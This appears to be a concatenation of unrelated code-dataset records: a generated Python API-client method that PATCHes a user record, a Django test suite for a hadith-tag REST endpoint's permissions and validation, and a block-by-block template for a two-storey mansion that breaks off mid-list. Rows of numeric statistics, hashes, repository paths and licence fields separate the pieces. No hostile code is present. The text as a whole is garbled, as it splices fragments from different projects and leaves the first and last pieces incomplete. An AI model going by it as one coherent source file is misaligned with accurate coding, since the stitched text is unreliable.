    local_var_params = {
        'app_id': app_id,
        'user_id_or_external_id': user_id_or_external_id,
        'user_update_body': user_update_body,
    }
    recognized_kwargs = frozenset([
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ])
    for key, val in six.iteritems(kwargs):
        if key not in recognized_kwargs:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_user" % key
            )
        local_var_params[key] = val

    # Client-side validation: every required parameter must be non-None.
    if self.api_client.client_side_validation:
        for required_name in ('app_id', 'user_id_or_external_id', 'user_update_body'):
            if local_var_params[required_name] is None:
                raise ApiValueError(
                    "Missing the required parameter `%s` "
                    "when calling `update_user`" % required_name)  # noqa: E501

    path_params = {
        'appId': local_var_params['app_id'],  # noqa: E501
        'userIdOrExternalId': local_var_params['user_id_or_external_id'],  # noqa: E501
    }
    query_params = []
    header_params = {
        # Negotiated response and request content types.
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/json']),  # noqa: E501
    }
    form_params = []
    local_var_files = {}
    body_params = local_var_params['user_update_body']
    # Both HTTP basic and bearer-token authentication are accepted.
    auth_settings = ['basicAuth', 'bearerAuth']  # noqa: E501

    return self.api_client.call_api(
        '/v2/apps/{appId}/users/{userIdOrExternalId}', 'PATCH',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='UserResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats={})
| 48.989521
| 472
| 0.61097
| 3,843
| 32,725
| 4.916992
| 0.059329
| 0.04276
| 0.062235
| 0.047417
| 0.96539
| 0.962743
| 0.957663
| 0.95634
| 0.95253
| 0.950307
| 0
| 0.014746
| 0.31615
| 32,725
| 667
| 473
| 49.062969
| 0.829617
| 0.447976
| 0
| 0.733746
| 1
| 0
| 0.2074
| 0.072642
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034056
| false
| 0
| 0.01548
| 0
| 0.083591
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d50529107f691c4a0a8a7180286443b0b393b797
| 9,777
|
py
|
Python
|
hadiths/tests/tests_hadithtagapi.py
|
rafidka/HadithHouseApi
|
207a9a35b820a7eebeb5f6e869cbc16e44e9d721
|
[
"MIT"
] | 1
|
2016-01-26T00:01:14.000Z
|
2016-01-26T00:01:14.000Z
|
hadiths/tests/tests_hadithtagapi.py
|
rafidka/HadithHouseApi
|
207a9a35b820a7eebeb5f6e869cbc16e44e9d721
|
[
"MIT"
] | 190
|
2015-11-12T20:54:31.000Z
|
2018-02-04T21:37:18.000Z
|
hadiths/tests/tests_hadithtagapi.py
|
hadithhouse/HadithHouseWebsite
|
3b59c42356262ee2a848e1e2251d5c51b4a669d1
|
[
"MIT"
] | 3
|
2016-02-24T20:22:26.000Z
|
2017-02-01T23:04:18.000Z
|
from django.test import Client
from rest_framework.status import HTTP_403_FORBIDDEN, HTTP_400_BAD_REQUEST, HTTP_200_OK, HTTP_201_CREATED, \
HTTP_204_NO_CONTENT
from hadiths.tests.setup import TestCaseBase
class HadithTagGetApiTestCase(TestCaseBase):
    """Tests for retrieving hadith tags via GET."""

    def test__get_json__200(self):
        # The default (JSON) representation should be served successfully.
        response = self.get_hadithtag()
        self.assertEqual(HTTP_200_OK, response.status_code)

    def test__get_form__200(self):
        # The HTML (browsable) representation should also be served.
        response = self.get_hadithtag(HTTP_ACCEPT='text/html')
        self.assertEqual(HTTP_200_OK, response.status_code)
class HadithTagPostApiTestCase(TestCaseBase):
    """Tests for creating hadith tags via POST."""

    def _post_tag(self, payload, token=None):
        """POST *payload* to the hadith-tag endpoint, optionally with an fb_token."""
        url = '/apis/hadithtags'
        if token is not None:
            url = '%s?fb_token=%s' % (url, token)
        return self.post(url, payload)

    def _assert_forbidden(self, response, message):
        """Assert a 403 response carrying *message* in its error field."""
        self.assertEqual(HTTP_403_FORBIDDEN, response.status_code)
        self.assertEqual(HTTP_403_FORBIDDEN, response.data['status_code'])
        self.assertEqual(message, response.data['error'])

    def _assert_name_error(self, response, expected_messages):
        """Assert a 400 response with validation errors on the 'name' field."""
        self.assertEqual(HTTP_400_BAD_REQUEST, response.status_code)
        self.assertEqual(HTTP_400_BAD_REQUEST, response.data['status_code'])
        self.assertEqual("Invalid input.", response.data['error'])
        self.assertTrue('name' in response.data['detail'])
        self.assertEqual(expected_messages, response.data['detail']['name'])

    def test__no_auth_token__403(self):
        response = self._post_tag({'name': 'test'})
        self._assert_forbidden(response, "Couldn't authenticate user.")

    def test__invalid_auth_token__403(self):
        response = self._post_tag({'name': 'test'}, TestCaseBase.invalid_accesstoken)
        self._assert_forbidden(response, "Invalid Facebook access token.")

    def test__valid_auth_token__no_user_permission__401(self):
        # NOTE(review): the name says 401 but the assertions expect 403 — confirm intent.
        response = self._post_tag({'name': 'test'}, TestCaseBase.jack_accesstoken)
        self._assert_forbidden(response, "User doesn't have permission for this action.")

    def test__valid_auth_token__user_permission__no_name__400(self):
        response = self._post_tag({}, TestCaseBase.marie_accesstoken)
        self._assert_name_error(response, ['This field is required.'])

    def test__valid_auth_token__user_permission__blank_name__400(self):
        response = self._post_tag({'name': ' '}, TestCaseBase.marie_accesstoken)
        self._assert_name_error(response, ['This field may not be blank.'])

    def test__valid_auth_token__user_permission__valid_name__tag_added(self):
        response = self._post_tag({'name': 'test'}, TestCaseBase.marie_accesstoken)
        self.assertEqual(HTTP_201_CREATED, response.status_code)
        created = response.data
        self.assertEqual('test', created['name'])
        # The created tag must be retrievable and round-trip unchanged.
        fetched = self.get('/apis/hadithtags/%d' % created['id'])
        self.assertEqual(HTTP_200_OK, fetched.status_code)
        self.assertEqual(created, fetched.data)
class HadithTagPutApiTestCase(TestCaseBase):
    """Tests for replacing a hadith tag via PUT."""

    tag = None      # fixture tag record created once for the whole test case
    tag_id = None   # its database id

    @classmethod
    def setUpClass(cls):
        TestCaseBase.setUpClass()
        client = Client()
        response = client.post('/apis/hadithtags?fb_token=%s' % TestCaseBase.marie_accesstoken, {'name': 'test'})
        assert response.status_code == HTTP_201_CREATED
        cls.tag = response.data
        cls.tag_id = cls.tag['id']

    @classmethod
    def tearDownClass(cls):
        client = Client()
        # NOTE(review): this delete payload uses 'title' where the rest of the
        # file uses 'name' — presumably ignored by the endpoint; confirm.
        response = client.delete('/apis/hadithtags/%d?fb_token=%s' %
                                 (HadithTagPutApiTestCase.tag_id, TestCaseBase.marie_accesstoken), {'title': 'test'})
        assert response.status_code == HTTP_204_NO_CONTENT
        TestCaseBase.tearDownClass()

    def _put_tag(self, payload, token=None):
        """PUT *payload* to the fixture tag's URL, optionally with an fb_token."""
        url = '/apis/hadithtags/%d' % HadithTagPutApiTestCase.tag_id
        if token is not None:
            url = '%s?fb_token=%s' % (url, token)
        return self.put(url, payload)

    def _assert_forbidden(self, response, message):
        """Assert a 403 response carrying *message* in its error field."""
        self.assertEqual(HTTP_403_FORBIDDEN, response.status_code)
        self.assertEqual(HTTP_403_FORBIDDEN, response.data['status_code'])
        self.assertEqual(message, response.data['error'])

    def _assert_name_error(self, response, expected_messages):
        """Assert a 400 response with validation errors on the 'name' field."""
        self.assertEqual(HTTP_400_BAD_REQUEST, response.status_code)
        self.assertEqual(HTTP_400_BAD_REQUEST, response.data['status_code'])
        self.assertEqual("Invalid input.", response.data['error'])
        self.assertTrue('name' in response.data['detail'])
        self.assertEqual(expected_messages, response.data['detail']['name'])

    def test__no_auth_token__403(self):
        self._assert_forbidden(self._put_tag({'name': 'test'}),
                               "Couldn't authenticate user.")

    def test__invalid_auth_token__403(self):
        self._assert_forbidden(self._put_tag({'name': 'test'}, TestCaseBase.invalid_accesstoken),
                               "Invalid Facebook access token.")

    def test__valid_auth_token__no_user_permission__401(self):
        # NOTE(review): the name says 401 but the assertions expect 403 — confirm intent.
        self._assert_forbidden(self._put_tag({'name': 'test'}, TestCaseBase.jack_accesstoken),
                               "User doesn't have permission for this action.")

    def test__valid_auth_token__user_permission__no_name__400(self):
        self._assert_name_error(self._put_tag({}, TestCaseBase.marie_accesstoken),
                                ['This field is required.'])

    def test__valid_auth_token__user_permission__blank_name__400(self):
        self._assert_name_error(self._put_tag({'name': ' '}, TestCaseBase.marie_accesstoken),
                                ['This field may not be blank.'])

    def test__valid_auth_token__user_permission__valid_new_name__tag_updated(self):
        response = self._put_tag({'name': 'test_updated'}, TestCaseBase.marie_accesstoken)
        self.assertEqual(HTTP_200_OK, response.status_code)
        updated = response.data
        self.assertEqual('test_updated', updated['name'])
        # The update must be visible on a subsequent GET.
        fetched = self.get('/apis/hadithtags/%d' % updated['id'])
        self.assertEqual(HTTP_200_OK, fetched.status_code)
        self.assertEqual(updated, fetched.data)
class HadithTagPatchApiTestCase(TestCaseBase):
    """Tests for partially updating a hadith tag via PATCH."""

    tag = None      # fixture tag record created once for the whole test case
    tag_id = None   # its database id

    @classmethod
    def setUpClass(cls):
        TestCaseBase.setUpClass()
        client = Client()
        response = client.post('/apis/hadithtags?fb_token=%s' % TestCaseBase.marie_accesstoken, {'name': 'test'})
        assert response.status_code == HTTP_201_CREATED
        cls.tag = response.data
        cls.tag_id = cls.tag['id']

    @classmethod
    def tearDownClass(cls):
        client = Client()
        response = client.delete('/apis/hadithtags/%d?fb_token=%s' %
                                 (HadithTagPatchApiTestCase.tag_id, TestCaseBase.marie_accesstoken), {'name': 'test'})
        assert response.status_code == HTTP_204_NO_CONTENT
        TestCaseBase.tearDownClass()

    def _patch_tag(self, payload, token=None):
        """PATCH *payload* to the fixture tag's URL, optionally with an fb_token."""
        url = '/apis/hadithtags/%d' % HadithTagPatchApiTestCase.tag_id
        if token is not None:
            url = '%s?fb_token=%s' % (url, token)
        return self.patch(url, payload)

    def _assert_forbidden(self, response, message):
        """Assert a 403 response carrying *message* in its error field."""
        self.assertEqual(HTTP_403_FORBIDDEN, response.status_code)
        self.assertEqual(HTTP_403_FORBIDDEN, response.data['status_code'])
        self.assertEqual(message, response.data['error'])

    def test__patch__no_auth_token__403(self):
        self._assert_forbidden(self._patch_tag({'name': 'test'}),
                               "Couldn't authenticate user.")

    def test__patch__invalid_auth_token__403(self):
        self._assert_forbidden(self._patch_tag({'name': 'test'}, TestCaseBase.invalid_accesstoken),
                               "Invalid Facebook access token.")

    def test__patch__valid_auth_token__no_user_permission__401(self):
        # NOTE(review): the name says 401 but the assertions expect 403 — confirm intent.
        self._assert_forbidden(self._patch_tag({'name': 'test'}, TestCaseBase.jack_accesstoken),
                               "User doesn't have permission for this action.")

    def test__patch__valid_auth_token__user_permission__no_title__200(self):
        # PATCH with an empty payload is accepted as a no-op update.
        response = self._patch_tag({}, TestCaseBase.marie_accesstoken)
        self.assertEqual(HTTP_200_OK, response.status_code)

    def test__patch__valid_auth_token__user_permission__blank_title__400(self):
        response = self._patch_tag({'name': ' '}, TestCaseBase.marie_accesstoken)
        self.assertEqual(HTTP_400_BAD_REQUEST, response.status_code)
        self.assertEqual(HTTP_400_BAD_REQUEST, response.data['status_code'])
        self.assertEqual("Invalid input.", response.data['error'])
        self.assertTrue('name' in response.data['detail'])
        self.assertEqual(['This field may not be blank.'], response.data['detail']['name'])

    def test__patch__valid_auth_token__user_permission__valid_title__person_updated(self):
        response = self._patch_tag({'name': 'test_updated'}, TestCaseBase.marie_accesstoken)
        self.assertEqual(HTTP_200_OK, response.status_code)
        updated = response.data
        self.assertEqual('test_updated', updated['name'])
        # The update must be visible on a subsequent GET.
        fetched = self.get('/apis/hadithtags/%d' % updated['id'])
        self.assertEqual(HTTP_200_OK, fetched.status_code)
        self.assertEqual(updated, fetched.data)
| 47.461165
| 120
| 0.727012
| 1,269
| 9,777
| 5.277384
| 0.080378
| 0.138868
| 0.104972
| 0.104524
| 0.921308
| 0.921308
| 0.901747
| 0.895774
| 0.878154
| 0.849485
| 0
| 0.024162
| 0.136443
| 9,777
| 205
| 121
| 47.692683
| 0.769039
| 0
| 0
| 0.719298
| 0
| 0
| 0.176741
| 0.058096
| 0
| 0
| 0
| 0
| 0.415205
| 1
| 0.140351
| false
| 0
| 0.017544
| 0
| 0.204678
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d51236b81664ed3979f4d6dcbfe5a73b9b5b075a
| 12,002
|
py
|
Python
|
stock-filters/Buildings/mansion.py
|
Chris-Drury/caMelGDMC
|
b7498fedb57837b18bbf172e3f34bc285559e3dd
|
[
"0BSD"
] | null | null | null |
stock-filters/Buildings/mansion.py
|
Chris-Drury/caMelGDMC
|
b7498fedb57837b18bbf172e3f34bc285559e3dd
|
[
"0BSD"
] | null | null | null |
stock-filters/Buildings/mansion.py
|
Chris-Drury/caMelGDMC
|
b7498fedb57837b18bbf172e3f34bc285559e3dd
|
[
"0BSD"
] | null | null | null |
from Buildings.material import AIR, DIRT, BRICKS, LOG, STAIRS_STONE, BED, DOOR, GLASS, TORCH, PLANK, WOOD
# Voxel template for a two-storey "mansion" building.
#
# "height": -1 — presumably a sentinel telling the placement code to pick the
#     ground level itself; TODO confirm against the consumer of this dict.
# "building": a list of 11 horizontal layers, bottom to top; each layer is a
#     12x12 grid of block constants from Buildings.material.
#     NOTE(review): the axis order (layer -> row -> column) is inferred from
#     the literal's shape only — confirm against the placement code.
mansion = {
    "height": -1,
    "building": [
        # Layer 0: dirt foundation with a stone-brick floor inset.
        [
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, DIRT, DIRT, DIRT, DIRT, DIRT, DIRT, DIRT, DIRT, DIRT, AIR],
            [AIR, AIR, DIRT, BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], DIRT, AIR],
            [AIR, AIR, DIRT, BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], DIRT, AIR],
            [AIR, AIR, DIRT, BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], DIRT, AIR],
            [AIR, AIR, DIRT, DIRT, DIRT, DIRT, BRICKS["STONE"], DIRT, DIRT, DIRT, DIRT, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
        ],
        # Layer 1: ground-storey walls with beds, a staircase block and the
        # lower half of the entrance door.
        [
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, LOG, BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], LOG, BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], LOG, AIR],
            [AIR, AIR, BRICKS["STONE"], AIR, AIR, BRICKS["STONE"], BRICKS["STONE"], STAIRS_STONE["N"], AIR, AIR, BRICKS["STONE"], AIR],
            [AIR, AIR, BRICKS["STONE"], BED["W_HEAD_TAKEN"], AIR, AIR, AIR, AIR, AIR, AIR, BRICKS["STONE"], AIR],
            [AIR, AIR, BRICKS["STONE"], BED["W_FOOT"], AIR, AIR, AIR, AIR, BED["S_FOOT"], BED["S_HEAD"], BRICKS["STONE"], AIR],
            [AIR, AIR, LOG, BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], DOOR["S_LOWER"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], LOG, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
        ],
        # Layer 2: ground-storey window band and the door's upper half.
        [
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, LOG, BRICKS["STONE"], GLASS, BRICKS["STONE"], LOG, BRICKS["STONE"], GLASS, BRICKS["STONE"], LOG, AIR],
            [AIR, AIR, BRICKS["STONE"], AIR, AIR, BRICKS["STONE"], STAIRS_STONE["N"], AIR, AIR, AIR, BRICKS["STONE"], AIR],
            [AIR, AIR, GLASS, AIR, AIR, AIR, AIR, AIR, AIR, AIR, GLASS, AIR],
            [AIR, AIR, BRICKS["STONE"], AIR, AIR, AIR, AIR, AIR, AIR, AIR, BRICKS["STONE"], AIR],
            [AIR, AIR, LOG, BRICKS["STONE"], GLASS, BRICKS["STONE"], DOOR["LEFT_UPPER"], BRICKS["STONE"], GLASS, BRICKS["STONE"], LOG, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
        ],
        # Layer 3: top of the ground-storey walls, with interior torches and
        # another stair step continuing upward.
        [
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, LOG, BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], LOG, BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], LOG, AIR],
            [AIR, AIR, BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], STAIRS_STONE["N"], AIR, AIR, AIR, AIR, BRICKS["STONE"], AIR],
            [AIR, AIR, BRICKS["STONE"], TORCH["S"], AIR, AIR, AIR, AIR, AIR, TORCH["N"], BRICKS["STONE"], AIR],
            [AIR, AIR, BRICKS["STONE"], AIR, AIR, AIR, AIR, AIR, AIR, AIR, BRICKS["STONE"], AIR],
            [AIR, AIR, LOG, BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], LOG, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
        ],
        # Layer 4: first-floor ceiling/floor — log ring with plank flooring
        # and an opening left for the stairwell.
        [
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, LOG, LOG, LOG, LOG, LOG, LOG, LOG, LOG, LOG, AIR],
            [AIR, AIR, LOG, BRICKS["STONE"], STAIRS_STONE["N"], AIR, AIR, AIR, PLANK, PLANK, WOOD["ACACIA"], AIR],
            [AIR, AIR, LOG, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, WOOD["ACACIA"], AIR],
            [AIR, AIR, LOG, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, WOOD["ACACIA"], AIR],
            [AIR, AIR, LOG, WOOD["STRIPPED_OAK"], WOOD["STRIPPED_OAK"], WOOD["STRIPPED_OAK"], LOG, WOOD["STRIPPED_OAK"], WOOD["STRIPPED_OAK"], WOOD["STRIPPED_OAK"], LOG, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
        ],
        # Layer 5: upper-storey walls with two more beds.
        [
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, LOG, PLANK, PLANK, PLANK, LOG, PLANK, PLANK, PLANK, LOG, AIR],
            [AIR, AIR, PLANK, AIR, AIR, AIR, AIR, AIR, AIR, AIR, PLANK, AIR],
            [AIR, AIR, PLANK, AIR, AIR, AIR, AIR, AIR, AIR, AIR, PLANK, AIR],
            [AIR, AIR, PLANK, BED["N_HEAD"], BED["N_FOOT"], AIR, AIR, AIR, BED["S_FOOT"], BED["S_HEAD"], PLANK, AIR],
            [AIR, AIR, LOG, PLANK, PLANK, PLANK, LOG, PLANK, PLANK, PLANK, LOG, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
        ],
        # Layer 6: upper-storey window band with an interior torch.
        [
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, LOG, PLANK, GLASS, PLANK, LOG, PLANK, GLASS, PLANK, LOG, AIR],
            [AIR, AIR, PLANK, AIR, AIR, AIR, TORCH["E"], AIR, AIR, AIR, PLANK, AIR],
            [AIR, AIR, GLASS, AIR, AIR, AIR, AIR, AIR, AIR, AIR, GLASS, AIR],
            [AIR, AIR, PLANK, AIR, AIR, AIR, AIR, AIR, AIR, AIR, PLANK, AIR],
            [AIR, AIR, LOG, PLANK, GLASS, PLANK, LOG, PLANK, GLASS, PLANK, LOG, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
        ],
        # Layer 7: top of the upper-storey walls plus the widest roof ring.
        [
            [AIR, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK],
            [AIR, AIR, LOG, PLANK, PLANK, PLANK, LOG, PLANK, PLANK, PLANK, LOG, AIR],
            [AIR, AIR, PLANK, AIR, AIR, AIR, AIR, AIR, AIR, AIR, PLANK, AIR],
            [AIR, AIR, PLANK, TORCH["S"], AIR, AIR, AIR, AIR, AIR, TORCH["N"], PLANK, AIR],
            [AIR, AIR, PLANK, AIR, AIR, AIR, AIR, AIR, AIR, AIR, PLANK, AIR],
            [AIR, AIR, LOG, PLANK, PLANK, PLANK, LOG, PLANK, PLANK, PLANK, LOG, AIR],
            [AIR, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
        ],
        # Layer 8: roof, stepping inward.
        [
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK],
            [AIR, AIR, PLANK, AIR, AIR, AIR, AIR, AIR, AIR, AIR, PLANK, AIR],
            [AIR, AIR, PLANK, AIR, AIR, AIR, AIR, AIR, AIR, AIR, PLANK, AIR],
            [AIR, AIR, PLANK, AIR, AIR, AIR, AIR, AIR, AIR, AIR, PLANK, AIR],
            [AIR, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
        ],
        # Layer 9: roof, stepping further inward.
        [
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK],
            [AIR, AIR, PLANK, AIR, AIR, AIR, AIR, AIR, AIR, AIR, PLANK, AIR],
            [AIR, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
        ],
        # Layer 10: roof ridge (single row of planks).
        [
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
